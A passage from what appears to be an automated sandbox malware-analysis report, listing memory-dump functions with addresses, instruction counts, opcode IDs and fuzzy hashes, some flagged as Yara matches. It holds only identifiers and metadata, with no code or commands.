                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AC58EC, Relevance: .0, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2a6fcaca81dcb89ae05f98a7d661ecbcca429f0535a9aeb449c498cd7a36d777
                                                                                                        • Instruction ID: 59b4c31721451f16b2b415a9dd0e9570dc0ca103f6b7cb7dfc10e185548df566
                                                                                                        • Opcode Fuzzy Hash: 2a6fcaca81dcb89ae05f98a7d661ecbcca429f0535a9aeb449c498cd7a36d777
                                                                                                        • Instruction Fuzzy Hash: 6501BC31E00908DBC714EF38DC11EAE77E8EB40320B5600E9F90597281DF70EE41C695
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00ADB02A, Relevance: .0, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                        • Instruction ID: 2805ffd50a363e2b1fc6d8dbd833790f2c8b9e0d1a600601265f0302af128bd2
                                                                                                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                        • Instruction Fuzzy Hash: 36017C32225984DFD322C71DD988F6777E8EB45B50F0A00E2F91ACBB51D728DC40C621
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B91074, Relevance: .0, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a50d5ca604a095a3c5d7a9bad332fcfdb6bd7cae9fd8b711f5899303b7ff83d1
                                                                                                        • Instruction ID: 7b52d2a1cffc4e036b97ad1e09e155dd0d3e7b1ced2240dabd117ec6a5b4dfe8
                                                                                                        • Opcode Fuzzy Hash: a50d5ca604a095a3c5d7a9bad332fcfdb6bd7cae9fd8b711f5899303b7ff83d1
                                                                                                        • Instruction Fuzzy Hash: 070128725047429FCB10EB29C941B1A77D9EB84310F04CA79F88583291EE71D880DB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B7FEC0, Relevance: .0, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a455857f835d34618a20d3aedf765a793b8189e8d34ad89e026763a0f43c6130
                                                                                                        • Instruction ID: bf5666febcbfee2bf445b11c14b8c1104d72043c6f9c45f1eb7ae53384069f91
                                                                                                        • Opcode Fuzzy Hash: a455857f835d34618a20d3aedf765a793b8189e8d34ad89e026763a0f43c6130
                                                                                                        • Instruction Fuzzy Hash: 36018471A01209AFCB14DFA9D846FBEBBF8EF44700F0040A6F905AB291EA74DA01C795
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B7FE3F, Relevance: .0, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 988739e6491cf9325b1bb11491911032c644b334aca42844b0fb8fcdcd6da066
                                                                                                        • Instruction ID: 3cd6b9fa6a3a785203fac39608547f6bcff670dd46d0bfbc058912e38157538e
                                                                                                        • Opcode Fuzzy Hash: 988739e6491cf9325b1bb11491911032c644b334aca42844b0fb8fcdcd6da066
                                                                                                        • Instruction Fuzzy Hash: 06018471A04249AFCB14DFA9D846FBEBBF8EF44700F0040A6F904AB292DA74D901C795
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B98A62, Relevance: .0, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1f4a7929c2dc0bd0eaf32d86b58df040a1d3ca5ad043f112561ec8550cc23a76
                                                                                                        • Instruction ID: a31606a54cc97bde8c0574aa61e4f397459d6c341ffe440c19454d682e3547a4
                                                                                                        • Opcode Fuzzy Hash: 1f4a7929c2dc0bd0eaf32d86b58df040a1d3ca5ad043f112561ec8550cc23a76
                                                                                                        • Instruction Fuzzy Hash: 45012171A0021C9FCB04DFA9D9419AEBBF8EF49310F1040AAF905E7351DB74A900CBA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B98ED6, Relevance: .0, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 62536435ae4c2dd027a8ca1c644709a88555776ec7ad54c3f3499e26be2f92a8
                                                                                                        • Instruction ID: 79b220793c731508f1119e30b85fa44fc03f94d4fe19d8b9cadfe0459cb4c6ab
                                                                                                        • Opcode Fuzzy Hash: 62536435ae4c2dd027a8ca1c644709a88555776ec7ad54c3f3499e26be2f92a8
                                                                                                        • Instruction Fuzzy Hash: 9E111E70A042499FDB04DFA9D545BAEFBF4FF08300F1442BAE519EB382EA349940CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00ACDB60, Relevance: .0, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                        • Instruction ID: e95a58f552d71790e9bf257bdfc5216efec4da5323cbe676709b26225bf07986
                                                                                                        • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                        • Instruction Fuzzy Hash: F3F096332456729BD7326B5589C5F6BB6A59FC1B60F27003DF109AB744CE608C0297E5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00ACB1E1, Relevance: .0, Instructions: 42COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                        • Instruction ID: 0f2169352f61d9ed300467cf7eae06eba7a0da6a5574459c3a180124c784ba39
                                                                                                        • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                        • Instruction Fuzzy Hash: 3401F432254684DBD322975DE945FA97BD8EF52750F0900A5F9188BAB2EB7ACC00D724
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B5FE87, Relevance: .0, Instructions: 38COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 690df33900c1c925fd283dcc25fb6790b94bbe168b1791738d20de3f3587ad73
                                                                                                        • Instruction ID: 31ffbfd0639f3e425bc95e9ce7abe216a761fb94b58e7e14d6597728d19a60a6
                                                                                                        • Opcode Fuzzy Hash: 690df33900c1c925fd283dcc25fb6790b94bbe168b1791738d20de3f3587ad73
                                                                                                        • Instruction Fuzzy Hash: E2016270A0420DEFCB14DFA8D542A6EBBF4EF04300F1441A9B909DB393DA35D901CB40
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00415671, Relevance: .0, Instructions: 36COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 95acde76e56c6c61e719ccc20c6f623d179dea4b9490d28e5711dab226c11066
                                                                                                        • Instruction ID: e7f23b71820ab38d6e212254c5ae06bbda3e29534ceda5d2f7f5e9152be9d699
                                                                                                        • Opcode Fuzzy Hash: 95acde76e56c6c61e719ccc20c6f623d179dea4b9490d28e5711dab226c11066
                                                                                                        • Instruction Fuzzy Hash: 5EE0C032F8448847C10409187C025B4FB00EB53216B2403AFDA0DE37C1CA43C42643D8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B8131B, Relevance: .0, Instructions: 36COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 879078c4052656795df54b1ded718b6d5907fa760fb89daf75222d2c8fba15e9
                                                                                                        • Instruction ID: 865926714b4dca17e3f33bc2111044a5fe54d7be7b9ea611c8067b5a626cd704
                                                                                                        • Opcode Fuzzy Hash: 879078c4052656795df54b1ded718b6d5907fa760fb89daf75222d2c8fba15e9
                                                                                                        • Instruction Fuzzy Hash: 1F014471A0524CAFCB04EFA9D545AAEB7F4FF08700F104099F905EB392E674DA00DB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B98F6A, Relevance: .0, Instructions: 36COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c7fd155d4b4ffe4d72e81611e77fd1f91961ecaa544c6f76e02c24b9b9d30788
                                                                                                        • Instruction ID: c1489363d9d311fbcafbb99031d7d8dd42346f52967cb188ae6812181340bcfa
                                                                                                        • Opcode Fuzzy Hash: c7fd155d4b4ffe4d72e81611e77fd1f91961ecaa544c6f76e02c24b9b9d30788
                                                                                                        • Instruction Fuzzy Hash: 46013174A0420CAFCB04EFB9D545AAEB7F4EF18300F1044A9B905EB391EA74DA00CB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00415659, Relevance: .0, Instructions: 34COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 231d194e22f38f3cf33680572acf3a1522ee0f0b430ad99cd10e34904b139477
                                                                                                        • Instruction ID: b432ffdb57f473b4b6d0f210ae88f7a446076fa9d7090826ff6894219e9593e9
                                                                                                        • Opcode Fuzzy Hash: 231d194e22f38f3cf33680572acf3a1522ee0f0b430ad99cd10e34904b139477
                                                                                                        • Instruction Fuzzy Hash: 9BE0C031744C884BC1014908BC426F4F754D783221B1413EFDE45A7682C602C83653FD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B81608, Relevance: .0, Instructions: 34COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 415e3c53762817867f492fb93dcb859e5f4640e25e6fd8114561b39ebd840574
                                                                                                        • Instruction ID: 0b6e36cec3bd9e392a665d6f76f2584c0ee85a570ad17bb1ecc9fa5222a7ea78
                                                                                                        • Opcode Fuzzy Hash: 415e3c53762817867f492fb93dcb859e5f4640e25e6fd8114561b39ebd840574
                                                                                                        • Instruction Fuzzy Hash: 5AF06271A05248EFCB04EFA9D946E6EBBF8EF04300F0440A9F905EB392EA74D900CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AEC577, Relevance: .0, Instructions: 33COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ee8d26e9c37f1a96addffc400d7a3649eff93270c9aa0b610d81ba0378395e4d
                                                                                                        • Instruction ID: 39d2ca5ad0882011d8390a0dc3b02b3df6ac9052deef0b24ec2b149d461fa786
                                                                                                        • Opcode Fuzzy Hash: ee8d26e9c37f1a96addffc400d7a3649eff93270c9aa0b610d81ba0378395e4d
                                                                                                        • Instruction Fuzzy Hash: D5F0BEB29956D09FD732C72AC044F227FE89B05770F6484ABE41687242C7A4FC82C270
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B82073, Relevance: .0, Instructions: 32COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2ca06697385981da17a7a3fc6441570971a3f5f07a2a9e65894e895f3140e2ad
                                                                                                        • Instruction ID: 404ae9835ba39c2009cd365989b79650eb9af3e3b46eef6ea21031c49d9fa48a
                                                                                                        • Opcode Fuzzy Hash: 2ca06697385981da17a7a3fc6441570971a3f5f07a2a9e65894e895f3140e2ad
                                                                                                        • Instruction Fuzzy Hash: 06F0E53B4165854BEF32BF2979023E23BD8D756314F2D16D6E8A45B222CDB48D83CB64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B0927A, Relevance: .0, Instructions: 32COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                        • Instruction ID: b24cca58a7f8d0ff5adfe6f5dd06382f608a7bb2be19948e343301f08dc8df73
                                                                                                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                        • Instruction Fuzzy Hash: 47E092723406406BEB219E5ADC85F577BADEF86721F0440B9B9045E283CAE6DD0987A4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B98D34, Relevance: .0, Instructions: 32COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 990e8d2c457099df9ce4e64d3071b14d8db38a24154dbebc875cece928ddac7f
                                                                                                        • Instruction ID: a4c398e49bac04d3722dccdc011f805c109af7594a37250f1a996595523c7ae1
                                                                                                        • Opcode Fuzzy Hash: 990e8d2c457099df9ce4e64d3071b14d8db38a24154dbebc875cece928ddac7f
                                                                                                        • Instruction Fuzzy Hash: C4F05470A0464C9FDB14EFB9D546A6EB7F4EF14700F5080A9F915EB2D2EA74D900CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B98B58, Relevance: .0, Instructions: 31COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dd25869bc43877754f515c4ce11f6ed52c18c116ed52f6439690a15ff65f6841
                                                                                                        • Instruction ID: d2742e0d98345b8e2eb887a6c5ee927d47dfd3433eec4beb9f94d7236124f841
                                                                                                        • Opcode Fuzzy Hash: dd25869bc43877754f515c4ce11f6ed52c18c116ed52f6439690a15ff65f6841
                                                                                                        • Instruction Fuzzy Hash: 35F08970A042589BDB04EBA4D946E6E77F4EF04300F1404A9BA05DB3D2EB75D900C794
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B98CD6, Relevance: .0, Instructions: 31COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ad02188895056d43f96b6070941fd542b77840d79c15054ecf4a157a2b2cb4f7
                                                                                                        • Instruction ID: 879a461697a5338f29c5ae0661d88608f75a60f5132f4321a1301546fa9ffa29
                                                                                                        • Opcode Fuzzy Hash: ad02188895056d43f96b6070941fd542b77840d79c15054ecf4a157a2b2cb4f7
                                                                                                        • Instruction Fuzzy Hash: 0EF08270A0464CABCB04EFA9E946E6E77F4EF09300F1001A9F916EB2D2EA34D900C754
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AE746D, Relevance: .0, Instructions: 31COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c53e6637d61254b98f5100b5f5ac3a34e4ed2b72e250a3eb84be968890766dc0
                                                                                                        • Instruction ID: 45f770440e17f5756cc39c411d017f903e6c8847fcc45bf3eb270460e07da3f1
                                                                                                        • Opcode Fuzzy Hash: c53e6637d61254b98f5100b5f5ac3a34e4ed2b72e250a3eb84be968890766dc0
                                                                                                        • Instruction Fuzzy Hash: CEF0E234A0C2C5AADF11EB6AC940F7DBFF1AF14310F1402A6E891AB1E1E765DC00C785
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AC4F2E, Relevance: .0, Instructions: 31COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bfd3446579a0ccf89bb19738cc263db2e25ac30ff98f37df1be5a5b6d25bd941
                                                                                                        • Instruction ID: 427713d3be15d5808746f01290c62b471b0eec7e6ba872cf4c481816b7e29104
                                                                                                        • Opcode Fuzzy Hash: bfd3446579a0ccf89bb19738cc263db2e25ac30ff98f37df1be5a5b6d25bd941
                                                                                                        • Instruction Fuzzy Hash: 25F0E2325396A89FD770E718D188B22B7E5EB09778F5548F4D40987922C734EC80C790
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AFA44B, Relevance: .0, Instructions: 29COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8ae2ed4dba16c39ebdf391ed4c4ced726bd7e47d874ab8b3d1ad26f9f8939970
                                                                                                        • Instruction ID: 806765171a7b95372a5acd3363fc648d6158cc2a96ed03a3d74a4928a87512db
                                                                                                        • Opcode Fuzzy Hash: 8ae2ed4dba16c39ebdf391ed4c4ced726bd7e47d874ab8b3d1ad26f9f8939970
                                                                                                        • Instruction Fuzzy Hash: F6E092B2B41421ABD2215B58AC01FA6B3ADDBE9751F198035F608C7250DA68DD01C7E1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00ACF358, Relevance: .0, Instructions: 28COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                        • Instruction ID: cca35d41c456aeb02bbdd3a5b0aca07be14384366be41b03e0ffbaa65334c43c
                                                                                                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                        • Instruction Fuzzy Hash: 95E0D832A41158BFCB2196DD9E06FAABBADDB48B60F010166B904DF190D5609D00C2D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00ADFF60, Relevance: .0, Instructions: 22COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0ee599342cac1b3038f35f66f1505991fa3cf8da13d66d7aee3194b4a155248d
                                                                                                        • Instruction ID: 8b982b530c78aa279058a49912a5757a98d822516fb63ab1beb003d66ec698b0
                                                                                                        • Opcode Fuzzy Hash: 0ee599342cac1b3038f35f66f1505991fa3cf8da13d66d7aee3194b4a155248d
                                                                                                        • Instruction Fuzzy Hash: 31E0DFB02052449FDB34DB52D180F2E37B89B5A729F29807FF00B4B202C721DC80C256
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B541E8, Relevance: .0, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6d6df894f1675d48d09537e8744c7df80a7e487abe05c90156486e488a1342c8
                                                                                                        • Instruction ID: 907cbb42b12518d8eb3066bebf6b9500604ef417ff2da6f8932455dd84d07e1e
                                                                                                        • Opcode Fuzzy Hash: 6d6df894f1675d48d09537e8744c7df80a7e487abe05c90156486e488a1342c8
                                                                                                        • Instruction Fuzzy Hash: A6F01575920700DFCBA0EFAA990976436ECF74431AF7042EAA000872A5CFB44C89CF02
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B7D380, Relevance: .0, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                        • Instruction ID: 5f04ea93620f35834d357d2eda81b4ff500bf68aab2224df2de6c7f925db2b96
                                                                                                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                        • Instruction Fuzzy Hash: 99E0C231284244BBDB225E44CD01F697B66DF507E0F218035FE085A691C6759C91E6C8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AFA185, Relevance: .0, Instructions: 20COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 25de2f54f071e4fe883072eff60f7a75ab95f5e14c2b47b6522f0304181f0711
                                                                                                        • Instruction ID: 0df2ab9b71bf2a274b525ff1642a08002960600059f5ac49da0c82060aafad48
                                                                                                        • Opcode Fuzzy Hash: 25de2f54f071e4fe883072eff60f7a75ab95f5e14c2b47b6522f0304181f0711
                                                                                                        • Instruction Fuzzy Hash: 3CD02EA31200441BDB2C23839E24BB53396E7A8700F314AADF20B0B9A0DEF88CD0810E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406A9A, Relevance: .0, Instructions: 19COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 949563fc6d8bfd06414130d3ad1ea0afb7deb58bf76496031745ffb950a780f9
                                                                                                        • Instruction ID: bde55878b1b1853fd4d21fe84651de64293cb9de4a6c5632849250f46f2e3cdb
                                                                                                        • Opcode Fuzzy Hash: 949563fc6d8bfd06414130d3ad1ea0afb7deb58bf76496031745ffb950a780f9
                                                                                                        • Instruction Fuzzy Hash: CCC01226B5542905D3154C3DA840375E755A7C6131F04227F994AA7145C983D4964189
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AF16E0, Relevance: .0, Instructions: 17COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7b942bbbebde6a7c14c93c9d58fcb8470644bd09b28e87202e2f2320e53e4841
                                                                                                        • Instruction ID: 7db0feff217732cd864cb37b017d0188d4b797322785d2f2c5b50be5d9bc9e82
                                                                                                        • Opcode Fuzzy Hash: 7b942bbbebde6a7c14c93c9d58fcb8470644bd09b28e87202e2f2320e53e4841
                                                                                                        • Instruction Fuzzy Hash: DAD0A731100140D2DE2D5B559905B342255DB80785F38046CF30B994C1DFA5DC92E48C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B453CA, Relevance: .0, Instructions: 16COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
